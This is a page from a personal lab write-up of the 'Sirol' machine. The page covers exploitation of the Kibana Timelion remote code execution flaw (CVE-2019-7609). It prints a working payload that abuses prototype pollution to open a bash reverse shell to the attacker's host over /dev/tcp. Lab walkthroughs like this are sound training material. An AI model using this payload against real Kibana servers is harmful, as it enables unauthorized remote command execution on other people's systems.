🐧
Sirol
  • Sirol
    • Summary
  • Enumeration
    • TCP
    • UDP
    • Web Services
      • Nikto
      • Dirb Extensions
      • Dirsearch
      • goBuster
      • Robots
      • WhatWeb
    • 5601 Web Services
      • Nikto
      • Dirb Extensions
      • Dirsearch
      • goBuster
      • Robots
      • WhatWeb
    • Other Services
      • SSH
      • MYSQL
  • Exploitation
  • Priv Escalation
  • Notes
Powered by GitBook
On this page

Exploitation

PreviousMYSQLNextPriv Escalation

Last updated 2 years ago

This machine has taught me to not rely fully on searchsploit since there will be times that exploits will not come up. So we just google.

Looking it up lead me here, this website said the following:

Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.

Which is good because now this means that we could execue commands and get a reverse shell.

Exploit

  1. Open Kibana

  2. Past one of the following payload into the Timelion visualizer

  3. Click run

  4. On the left panel click on Canvas

  5. Your reverse shell should pop ! :)

These are the exact instructions from the author.

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/192.168.49.242/5601 0>&1\'");//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

I also had to cycle through open ports.

kibana
GitHub - mpgn/CVE-2019-7609: RCE on Kibana versions before 5.6.15 and 6.6.0 in the Timelion visualizerGitHub
Logo